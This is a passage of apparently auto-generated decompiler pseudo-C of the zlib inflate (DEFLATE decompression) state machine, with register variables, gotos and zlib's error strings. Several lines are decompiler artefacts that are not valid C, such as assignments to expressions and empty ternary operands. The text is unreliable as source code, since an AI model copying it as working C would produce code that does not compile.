												 *(__edi + 0x1c) = __eax;
												 *(__esp + 0x10) = 0;
												__esi = 0;
												__eflags = 0;
												 *(__ecx + 0x30) = __eax;
												 *(__edi + 4) = 0x3f3e;
												goto L161;
											} else {
												asm("o16 nop [eax+eax]");
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x20;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L160;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 0xa:
											L161:
											__eflags =  *(__edi + 0x10);
											if( *(__edi + 0x10) == 0) {
												__eax =  *(__esp + 0x20);
												 *(__ecx + 0xc) =  *(__esp + 0x20);
												__eax =  *(__esp + 0x1c);
												 *(__ecx + 0x10) =  *(__esp + 0x1c);
												__eax = 2;
												 *__ecx = __ebx;
												 *(__ecx + 4) = __ebp;
												 *(__edi + 0x40) = __esi;
												_pop(__esi);
												_pop(__ebp);
												_pop(__ebx);
												 *(__edi + 0x3c) = __edx;
												return 2;
											} else {
												_push(0);
												_push(0);
												_push(0);
												__eax = L01316A20();
												__ecx =  *(__esp + 0x54);
												__esp = __esp + 0xc;
												__edx =  *(__esp + 0x10);
												 *(__edi + 0x1c) = __eax;
												 *(__ecx + 0x30) = __eax;
												 *(__edi + 4) = 0x3f3f;
												goto L163;
											}
											goto L377;
										case 0xb:
											L163:
											__eax =  *(__esp + 0x4c);
											__eflags = __eax - 5;
											if(__eax == 5) {
												L359:
												__edi =  *(__esp + 0x10);
												__edx = __eax;
												goto L117;
											} else {
												__eflags = __eax - 6;
												if(__eax == 6) {
													goto L359;
												} else {
													goto L165;
												}
											}
											goto L377;
										case 0xc:
											L165:
											__eflags =  *(__edi + 8);
											if( *(__edi + 8) == 0) {
												__eflags = __esi - 3;
												if(__esi >= 3) {
													L170:
													__eax = __edx;
													__edx = __edx >> 1;
													 *(__edi + 8) = __eax;
													__eax = __edx;
													__eax = __edx & 0x00000003;
													switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M013165DC))) {
														case 0:
															 *(__edi + 4) = 0x3f41;
															goto L172;
														case 1:
															__eflags =  *(__esp + 0x4c) - 6;
															 *(__edi + 0x50) = 0x1331a30;
															 *(__edi + 0x58) = 9;
															 *(__edi + 0x54) = 0x1332230;
															 *(__edi + 0x5c) = 5;
															 *(__edi + 4) = 0x3f47;
															if( *(__esp + 0x4c) != 6) {
																L172:
																__ecx =  *(__esp + 0x48);
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																goto L191;
															} else {
																__edx = __edx >> 2;
																__esi = __esi - 3;
																 *(__esp + 0x10) = __edx;
																goto L115;
															}
															goto L377;
														case 2:
															__ecx =  *(__esp + 0x48);
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__edi + 4) = 0x3f44;
															 *(__esp + 0x10) = __edx;
															goto L191;
														case 3:
															__ecx =  *(__esp + 0x48);
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															 *(__ecx + 0x18) = "invalid block type";
															 *(__edi + 4) = 0x3f51;
															goto L191;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L115;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 3;
														if(__esi < 3) {
															continue;
														} else {
															goto L170;
														}
														goto L377;
													}
													goto L115;
												}
											} else {
												__ecx = __esi;
												 *(__edi + 4) = 0x3f4e;
												__ecx = __esi & 0x00000007;
												__edx = __edx >> __cl;
												__esi = __esi - __ecx;
												 *(__esp + 0x10) = __edx;
												goto L190;
											}
											goto L377;
										case 0xd:
											__esi = __esi & 0x00000007;
											__edx = __edx >> __cl;
											__esi = __esi - (__esi & 0x00000007);
											 *(__esp + 0x10) = __edx;
											__eflags = __esi - 0x20;
											if(__esi >= 0x20) {
												L181:
												__eax = __edx;
												__ecx = __dx & 0x0000ffff;
												 !__edx =  !__edx >> 0x10;
												__eflags = __ecx -  !__edx >> 0x10;
												if(__ecx ==  !__edx >> 0x10) {
													__edx = 0;
													 *(__edi + 0x44) = __ecx;
													__esi = 0;
													 *(__esp + 0x10) = 0;
													__eflags =  *(__esp + 0x4c) - 6;
													 *(__edi + 4) = 0x3f42;
													if( *(__esp + 0x4c) == 6) {
														__edi = 0;
														goto L116;
													} else {
														__ecx =  *(__esp + 0x48);
														goto L185;
													}
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "invalid stored block lengths";
													 *(__edi + 4) = 0x3f51;
													goto L191;
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0x20;
													if(__esi < 0x20) {
														continue;
													} else {
														goto L181;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 0xe:
											L185:
											 *(__edi + 4) = 0x3f43;
											goto L186;
										case 0xf:
											L186:
											__eax =  *(__edi + 0x44);
											__eflags = __eax;
											if(__eax == 0) {
												 *(__edi + 4) = 0x3f3f;
												goto L191;
											} else {
												__eflags = __eax - __ebp;
												__eax =  >  ? __ebp : __eax;
												__eflags = __eax -  *(__esp + 0x1c);
												__eax =  >  ?  *(__esp + 0x1c) : __eax;
												 *(__esp + 0x34) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													goto L115;
												} else {
													__eax = E013189A0( *(__esp + 0x28), __ebx, __eax);
													__eax =  *(__esp + 0x40);
													 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
													__ebx = __ebx + __eax;
													 *(__esp + 0x20) =  *(__esp + 0x20) + __eax;
													__ebp = __ebp - __eax;
													_t358 = __edi + 0x44;
													 *_t358 =  *(__edi + 0x44) - __eax;
													__eflags =  *_t358;
													 *(__esp + 0x14) = __ebx;
													goto L189;
												}
											}
											goto L377;
										case 0x10:
											__eflags = __esi - 0xe;
											if(__esi >= 0xe) {
												L198:
												__eax = __edx;
												__esi = __esi - 0xe;
												__eax = __edx & 0x0000001f;
												__edx = __edx >> 5;
												 *(__edi + 0x64) = __eax;
												__eax = __edx;
												__eax = __edx & 0x0000001f;
												__edx = __edx >> 5;
												 *(__edi + 0x68) = __eax;
												__eax = __edx;
												__eax = __edx & 0x0000000f;
												__edx = __edx >> 4;
												__eax = __eax + 4;
												 *(__esp + 0x10) = __edx;
												__eflags =  *(__edi + 0x64) - 0x11e;
												 *(__edi + 0x60) = __eax;
												if( *(__edi + 0x64) > 0x11e) {
													L212:
													 *(__ecx + 0x18) = "too many length or distance symbols";
													 *(__edi + 4) = 0x3f51;
													goto L191;
												} else {
													__eflags =  *(__edi + 0x68) - 0x1e;
													if( *(__edi + 0x68) > 0x1e) {
														goto L212;
													} else {
														 *(__edi + 0x6c) = 0;
														 *(__edi + 4) = 0x3f45;
														goto L201;
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L115;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__edx = __edx + __eax;
													 *(__esp + 0x14) = __ebx;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__eflags = __esi - 0xe;
													if(__esi < 0xe) {
														continue;
													} else {
														__ecx =  *(__esp + 0x48);
														goto L198;
													}
													goto L377;
												}
												goto L115;
											}
											goto L377;
										case 0x11:
											L201:
											__eax =  *(__edi + 0x6c);
											__eflags =  *(__edi + 0x6c) -  *(__edi + 0x60);
											if( *(__edi + 0x6c) >=  *(__edi + 0x60)) {
												L207:
												__eflags =  *(__edi + 0x6c) - 0x13;
												while( *(__edi + 0x6c) < 0x13) {
													__eax =  *(__edi + 0x6c);
													__ecx = 0;
													__eax =  *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff;
													 *((short*)(__edi + 0x74 + ( *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
													 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
													__eflags =  *(__edi + 0x6c) - 0x13;
												}
												__eax = __edi + 0x534;
												 *(__edi + 0x58) = 7;
												__ecx = __edi + 0x70;
												 *(__edi + 0x50) = __eax;
												 *(__edi + 0x70) = __eax;
												__edx = __edi + 0x58;
												__edi + 0x2f4 = __edi + 0x74;
												__eax = E01316F90(0, __edi + 0x74, 0x13, __ecx, __edi + 0x58, __edi + 0x2f4);
												 *(__esp + 0x2c) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													 *(__edi + 0x6c) = 0;
													 *(__edi + 4) = 0x3f46;
													goto L214;
												} else {
													__ecx =  *(__esp + 0x48);
													__edx =  *(__esp + 0x10);
													 *(__ecx + 0x18) = "invalid code lengths set";
													 *(__edi + 4) = 0x3f51;
													goto L191;
												}
											} else {
												do {
													__eflags = __esi - 3;
													if(__esi >= 3) {
														goto L206;
													} else {
														while(1) {
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L115;
															}
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 3;
															if(__esi < 3) {
																continue;
															} else {
																goto L206;
															}
															goto L377;
														}
														goto L115;
													}
													goto L377;
													L206:
													__eax =  *(__edi + 0x6c);
													__edx = __edx & 0x00000007;
													__edx = __edx >> 3;
													__esi = __esi - 3;
													 *(__esp + 0x10) = __edx;
													__eax =  *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff;
													 *((short*)(__edi + 0x74 + ( *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
													 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
													__eax =  *(__edi + 0x6c);
													__eflags =  *(__edi + 0x6c) -  *(__edi + 0x60);
												} while ( *(__edi + 0x6c) <  *(__edi + 0x60));
												goto L207;
											}
											goto L377;
										case 0x12:
											L214:
											 *(__edi + 0x68) =  *(__edi + 0x68) +  *(__edi + 0x64);
											__eflags =  *(__edi + 0x6c) -  *(__edi + 0x68) +  *(__edi + 0x64);
											if( *(__edi + 0x6c) >=  *(__edi + 0x68) +  *(__edi + 0x64)) {
												L249:
												__eflags =  *(__edi + 4) - 0x3f51;
												if( *(__edi + 4) == 0x3f51) {
													L189:
													__edx =  *(__esp + 0x10);
													goto L190;
												} else {
													__eflags =  *((short*)(__edi + 0x274));
													if( *((short*)(__edi + 0x274)) != 0) {
														__eax = __edi + 0x534;
														 *(__edi + 0x58) = 9;
														__ecx = __edi + 0x70;
														 *(__edi + 0x50) = __eax;
														 *(__edi + 0x70) = __eax;
														__edx = __edi + 0x58;
														__edi + 0x2f4 = __edi + 0x74;
														__eax = E01316F90(1, __edi + 0x74,  *(__edi + 0x64), __ecx, __edi + 0x58, __edi + 0x2f4);
														 *(__esp + 0x2c) = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *(__edi + 0x70);
															__ecx = __edi + 0x70;
															 *(__edi + 0x54) =  *(__edi + 0x70);
															__edx = __edi + 0x5c;
															__eax = __edi + 0x2f4;
															 *(__edi + 0x5c) = 6;
															__eax =  *(__edi + 0x64);
															 *(__edi + 0x64) + 0x3a = __edi + ( *(__edi + 0x64) + 0x3a) * 2;
															__eax = E01316F90(2, __edi + ( *(__edi + 0x64) + 0x3a) * 2,  *(__edi + 0x68), __edi + 0x70, __edx, __edi + 0x2f4);
															 *(__esp + 0x2c) = __eax;
															__eflags = __eax;
															if(__eax == 0) {
																__edx =  *(__esp + 0x4c);
																 *(__edi + 4) = 0x3f47;
																__eflags =  *(__esp + 0x4c) - 6;
																if( *(__esp + 0x4c) == 6) {
																	__edi =  *(__esp + 0x10);
																	goto L117;
																} else {
																	__edx =  *(__esp + 0x10);
																	__ecx =  *(__esp + 0x48);
																	goto L259;
																}
															} else {
																__ecx =  *(__esp + 0x48);
																__edx =  *(__esp + 0x10);
																 *(__ecx + 0x18) = "invalid distances set";
																 *(__edi + 4) = 0x3f51;
																goto L191;
															}
														} else {
															__ecx =  *(__esp + 0x48);
															__edx =  *(__esp + 0x10);
															 *(__ecx + 0x18) = "invalid literal/lengths set";
															 *(__edi + 4) = 0x3f51;
															goto L191;
														}
													} else {
														__ecx =  *(__esp + 0x48);
														__edx =  *(__esp + 0x10);
														 *(__ecx + 0x18) = "invalid code -- missing end-of-block";
														 *(__edi + 4) = 0x3f51;
														goto L191;
													}
												}
											} else {
												__edi =  *(__esp + 0x10);
												do {
													__eax =  *(__esp + 0x3c);
													__edx = 1;
													__ecx =  *( *(__esp + 0x3c));
													__eax =  *(__esp + 0x24);
													1 << __cl = (1 << __cl) - 1;
													__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
													__eax =  *( *(__esp + 0x24) + 0x50);
													__eax =  *( *( *(__esp + 0x24) + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__esp + 0x34) = __eax;
													__eflags = (__cl & 0x000000ff) - __esi;
													if((__cl & 0x000000ff) <= __esi) {
														L220:
														__eax = __eax >> 0x10;
														__eflags = __dx - 0x10;
														if(__eflags >= 0) {
															if(__eflags != 0) {
																__eflags =  *(__esp + 0x36) - 0x11;
																__edx =  *(__esp + 0x10);
																__ecx = __ah & 0x000000ff;
																if( *(__esp + 0x36) != 0x11) {
																	__edi = __ecx + 7;
																	 *(__esp + 0x34) = __ecx;
																	__eflags = __esi - __edi;
																	if(__esi >= __edi) {
																		L241:
																		__edx = __edx >> __cl;
																		__edx = __edx & 0x0000007f;
																		__eax = (__edx & 0x0000007f) + 0xb;
																		__edx = __edx >> 7;
																		__eflags = __edx;
																		 *(__esp + 0x30) = __eax;
																		__eax = 0xfffffff9;
																		goto L242;
																	} else {
																		while(1) {
																			__eflags = __ebp;
																			if(__ebp == 0) {
																				goto L115;
																			}
																			__eax =  *__ebx & 0x000000ff;
																			__ecx = __esi;
																			__eax = ( *__ebx & 0x000000ff) << __cl;
																			__ebx = __ebx + 1;
																			__edx = __edx + __eax;
																			 *(__esp + 0x14) = __ebx;
																			__esi = __esi + 8;
																			 *(__esp + 0x10) = __edx;
																			__ebp = __ebp - 1;
																			__eflags = __esi - __edi;
																			if(__esi < __edi) {
																				continue;
																			} else {
																				__ecx =  *(__esp + 0x34);
																				goto L241;
																			}
																			goto L377;
																		}
																		goto L115;
																	}
																} else {
																	__edi = __ecx + 3;
																	 *(__esp + 0x34) = __ecx;
																	__eflags = __esi - __edi;
																	if(__esi >= __edi) {
																		L235:
																		__edx = __edx >> __cl;
																		__edx = __edx & 0x00000007;
																		__eax = (__edx & 0x00000007) + 3;
																		__edx = __edx >> 3;
																		 *(__esp + 0x30) = __eax;
																		__eax = 0xfffffffd;
																		L242:
																		__edi =  *(__esp + 0x24);
																		__esi = __esi + __eax;
																		__eflags = __esi;
																		 *(__esp + 0x34) = 0;
																		goto L243;
																	} else {
																		while(1) {
																			__eflags = __ebp;
																			if(__ebp == 0) {
																				goto L115;
																			}
																			__eax =  *__ebx & 0x000000ff;
																			__ecx = __esi;
																			__eax = ( *__ebx & 0x000000ff) << __cl;
																			__ebx = __ebx + 1;
																			__edx = __edx + __eax;
																			 *(__esp + 0x14) = __ebx;
																			__esi = __esi + 8;
																			 *(__esp + 0x10) = __edx;
																			__ebp = __ebp - 1;
																			__eflags = __esi - __edi;
																			if(__esi < __edi) {
																				continue;
																			} else {
																				__ecx =  *(__esp + 0x34);
																				goto L235;
																			}
																			goto L377;
																		}
																		goto L115;
																	}
																}
															} else {
																__eax = __eax >> 8;
																__ecx = __cl & 0x000000ff;
																__ecx = (__cl & 0x000000ff) + 2;
																 *(__esp + 0x34) = __ecx;
																__eflags = __esi - __ecx;
																if(__esi >= __ecx) {
																	L227:
																	__edi =  *(__esp + 0x24);
																	__edx =  *(__esp + 0x10);
																	__ecx = __ah & 0x000000ff;
																	__edx =  *(__esp + 0x10) >> __cl;
																	__esi = __esi - (__ah & 0x000000ff);
																	__eax =  *(__edi + 0x6c);
																	 *(__esp + 0x10) = __edx;
																	__eflags = __eax;
																	if(__eax == 0) {
																		L252:
																		__ecx =  *(__esp + 0x48);
																		 *(__ecx + 0x18) = "invalid bit length repeat";
																		 *(__edi + 4) = 0x3f51;
																		goto L191;
																	} else {
																		 *(__esp + 0x34) = __eax;
																		__eax = __edx;
																		__eax = __edx & 0x00000003;
																		__edx = __edx >> 2;
																		__eax = __eax + 3;
																		__esi = __esi - 2;
																		 *(__esp + 0x30) = __eax;
																		L243:
																		__ecx =  *(__edi + 0x68);
																		__eax =  *(__edi + 0x6c);
																		__ecx =  *(__edi + 0x68) +  *(__edi + 0x64);
																		__eax =  *(__edi + 0x6c) +  *(__esp + 0x30);
																		 *(__esp + 0x10) = __edx;
																		__eflags =  *(__edi + 0x6c) +  *(__esp + 0x30) -  *(__edi + 0x68) +  *(__edi + 0x64);
																		if( *(__edi + 0x6c) +  *(__esp + 0x30) >  *(__edi + 0x68) +  *(__edi + 0x64)) {
																			goto L252;
																		} else {
																			__ecx =  *(__esp + 0x30);
																			__edx =  *(__esp + 0x34);
																			do {
																				__eax =  *(__edi + 0x6c);
																				 *(__edi + 0x74 +  *(__edi + 0x6c) * 2) = __dx;
																				 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
																				__eax =  *(__edi + 0x6c);
																				 *(__esp + 0x34) = __eax;
																				__ecx = __ecx - 1;
																				__eflags = __ecx;
																			} while (__ecx != 0);
																			__edi =  *(__esp + 0x10);
																			__edx = __eax;
																			__ecx =  *(__esp + 0x24);
																			goto L247;
																		}
																	}
																} else {
																	while(1) {
																		__eflags = __ebp;
																		if(__ebp == 0) {
																			goto L116;
																		}
																		__edx =  *__ebx & 0x000000ff;
																		__ecx = __esi;
																		__edx = ( *__ebx & 0x000000ff) << __cl;
																		__ebx = __ebx + 1;
																		__edi = __edi + __edx;
																		 *(__esp + 0x14) = __ebx;
																		__esi = __esi + 8;
																		 *(__esp + 0x10) = __edi;
																		__ebp = __ebp - 1;
																		__eflags = __esi -  *(__esp + 0x34);
																		if(__esi <  *(__esp + 0x34)) {
																			continue;
																		} else {
																			goto L227;
																		}
																		goto L377;
																	}
																	goto L116;
																}
															}
														} else {
															__eax = __eax >> 8;
															__ecx = __al & 0x000000ff;
															__edi = __edi >> __cl;
															__esi = __esi - (__al & 0x000000ff);
															__ecx =  *(__esp + 0x24);
															 *(__esp + 0x10) = __edi;
															__eax =  *(__ecx + 0x6c);
															 *(__ecx + 0x74 +  *(__ecx + 0x6c) * 2) = __dx;
															 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
															__edx =  *(__ecx + 0x6c);
															goto L247;
														}
													} else {
														while(1) {
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L116;
															}
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__edx = 1;
															__edi = __edi + (( *__ebx & 0x000000ff) << __cl);
															__ebx = __ebx + 1;
															__eax =  *(__esp + 0x3c);
															__esi = __esi + 8;
															__ebp = __ebp - 1;
															 *(__esp + 0x10) = __edi;
															 *(__esp + 0x14) = __ebx;
															__ecx =  *( *(__esp + 0x3c));
															__eax =  *(__esp + 0x24);
															1 << __cl = (1 << __cl) - 1;
															__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
															__eax =  *( *(__esp + 0x24) + 0x50);
															__eax =  *( *( *(__esp + 0x24) + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
															__eax = __eax >> 8;
															__ecx = __cl & 0x000000ff;
															 *(__esp + 0x34) = __eax;
															__eflags = (__cl & 0x000000ff) - __esi;
															if((__cl & 0x000000ff) > __esi) {
																continue;
															} else {
																goto L220;
															}
															goto L377;
														}
														goto L116;
													}
													goto L377;
													L247:
													 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64));
													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64));
												} while (__edx <  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64)));
												__edi =  *(__esp + 0x24);
												goto L249;
											}
											goto L377;
										case 0x13:
											L259:
											 *(__edi + 4) = 0x3f48;
											goto L260;
										case 0x14:
											L260:
											__eflags = __ebp - 6;
											if(__ebp < 6) {
												L264:
												__eax =  *(__edi + 0x50);
												__ecx =  *(__edi + 0x58);
												 *(__esp + 0x30) =  *(__edi + 0x50);
												1 = 1 << __cl;
												__ecx =  *(__edi + 0x50);
												__eax = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
												 *(__edi + 0x1bc8) = 0;
												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
												1 = 1 >> 8;
												__ecx = __cl & 0x000000ff;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) <= __esi) {
													L268:
													__eflags = __al;
													if(__al == 0) {
														L275:
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__edi + 0x1bc8) =  *(__edi + 0x1bc8) + __ecx;
														__esi = __esi - __ecx;
														__edx = __edx >> __cl;
														__ecx = __eax;
														__ecx = __eax >> 0x10;
														 *(__esp + 0x10) = __edx;
														 *(__edi + 0x44) = __ecx;
														__eflags = __al;
														if(__al != 0) {
															__eflags = __al & 0x00000020;
															if((__al & 0x00000020) == 0) {
																__eflags = __al & 0x00000040;
																if((__al & 0x00000040) == 0) {
																	__eax = __al & 0x000000ff;
																	__eax = __al & 0xf;
																	__eflags = __eax;
																	 *(__edi + 4) = 0x3f49;
																	 *(__edi + 0x4c) = __eax;
																	goto L282;
																} else {
																	__ecx =  *(__esp + 0x48);
																	 *(__ecx + 0x18) = "invalid literal/length code";
																	 *(__edi + 4) = 0x3f51;
																	goto L191;
																}
															} else {
																 *(__edi + 0x1bc8) = 0xffffffff;
																 *(__edi + 4) = 0x3f3f;
																goto L190;
															}
														} else {
															 *(__edi + 4) = 0x3f4d;
															goto L190;
														}
													} else {
														__eflags = __al & 0x000000f0;
														if((__al & 0x000000f0) != 0) {
															goto L275;
														} else {
															__ecx = __eax;
															__ebx = 1;
															__ecx = __eax >> 8;
															__edx = __eax;
															__edi = __cl & 0x000000ff;
															 *(__esp + 0x40) = __eax >> 8;
															__al & 0x000000ff = (__al & 0x000000ff) + __edi;
															__eax = __eax >> 0x10;
															__ebx = 1 << __cl;
															__ecx = __edi;
															__ebx = (1 << __cl) - 1;
															 *(__esp + 0x34) = __edx;
															(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
															__ecx =  *(__esp + 0x30);
															__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
															__eax =  *( *(__esp + 0x30) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
															__eax = __eax >> 8;
															__edi = __cl & 0x000000ff;
															 *(__esp + 0x40) = __cl & 0x000000ff;
															__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
															__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
															if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
																L274:
																__edi =  *(__esp + 0x24);
																__ebx =  *(__esp + 0x14);
																__ecx = __dh & 0x000000ff;
																__edx =  *(__esp + 0x10);
																__edx =  *(__esp + 0x10) >> __cl;
																__esi = __esi - __ecx;
																__eflags = __esi;
																 *(__edi + 0x1bc8) = __ecx;
																goto L275;
															} else {
																while(1) {
																	__eflags = __ebp;
																	if(__ebp == 0) {
																		goto L115;
																	}
																	__ebx =  *(__esp + 0x14);
																	__ecx = __esi;
																	__edi = 1;
																	__esi = __esi + 8;
																	__ebp = __ebp - 1;
																	__eax =  *__ebx & 0x000000ff;
																	__ebx = __ebx + 1;
																	 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
																	__eax =  *(__esp + 0x36) & 0x0000ffff;
																	 *(__esp + 0x14) = __ebx;
																	__ebx = __dh & 0x000000ff;
																	__dl & 0x000000ff = (__dl & 0x000000ff) + __ebx;
																	__edi = 1 << __cl;
																	__ecx = __ebx;
																	(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
																	__edi = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
																	__edi = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff);
																	__eax =  *(__esp + 0x24);
																	__eax =  *( *(__esp + 0x24) + 0x50);
																	__eax =  *( *( *(__esp + 0x24) + 0x50) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff)) * 4);
																	__eax = __eax >> 8;
																	__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
																	__eflags = (__cl & 0x000000ff) + __ebx - __esi;
																	if((__cl & 0x000000ff) + __ebx > __esi) {
																		continue;
																	} else {
																		goto L274;
																	}
																	goto L377;
																}
																goto L115;
															}
														}
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L115;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__ecx =  *(__edi + 0x58);
														__edx = __edx + __eax;
														__eax =  *(__edi + 0x50);
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__edx = 1;
														 *(__esp + 0x14) = __ebx;
														1 << __cl = (1 << __cl) - 1;
														__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
														__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
														__ecx = __eax;
														__edx =  *(__esp + 0x10);
														__eax >> 8 = __cl & 0x000000ff;
														__eflags = (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L268;
														}
														goto L377;
													}
													goto L115;
												}
											} else {
												__eflags =  *(__esp + 0x1c) - 0x102;
												if( *(__esp + 0x1c) < 0x102) {
													goto L264;
												} else {
													__eax =  *(__esp + 0x20);
													_push( *(__esp + 0x28));
													 *(__ecx + 0xc) = __eax;
													__eax =  *(__esp + 0x20);
													 *(__ecx + 0x10) =  *(__esp + 0x20);
													 *__ecx = __ebx;
													 *(__ecx + 4) = __ebp;
													_push(__ecx);
													 *(__edi + 0x3c) = __edx;
													 *(__edi + 0x40) = __esi;
													__eax = E01317440();
													__ecx =  *(__esp + 0x50);
													__esp = __esp + 8;
													__eflags =  *(__edi + 4) - 0x3f3f;
													__edx =  *(__edi + 0x3c);
													__esi =  *(__edi + 0x40);
													__eax =  *(__ecx + 0xc);
													__ebx =  *__ecx;
													__ebp =  *(__ecx + 4);
													 *(__esp + 0x20) =  *(__ecx + 0xc);
													__eax =  *(__ecx + 0x10);
													 *(__esp + 0x1c) =  *(__ecx + 0x10);
													 *(__esp + 0x14) = __ebx;
													 *(__esp + 0x10) = __edx;
													if( *(__edi + 4) == 0x3f3f) {
														 *(__edi + 0x1bc8) = 0xffffffff;
													}
													goto L191;
												}
											}
											goto L377;
										case 0x15:
											L282:
											__ecx =  *(__edi + 0x4c);
											__eflags = __ecx;
											if(__ecx == 0) {
												L288:
												__eax =  *(__edi + 0x44);
												 *(__edi + 0x1bcc) =  *(__edi + 0x44);
												 *(__edi + 4) = 0x3f4a;
												goto L289;
											} else {
												__eflags = __esi - __ecx;
												if(__esi >= __ecx) {
													L287:
													__eax = 1;
													__esi = __esi - __ecx;
													1 << __cl = (1 << __cl) - 1;
													__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
													__edx = __edx >> __cl;
													 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
													_t615 = __edi + 0x1bc8;
													 *_t615 =  *(__edi + 0x1bc8) + __ecx;
													__eflags =  *_t615;
													 *(__esp + 0x10) = __edx;
													goto L288;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L115;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__ecx =  *(__edi + 0x4c);
														__edx = __edx + __eax;
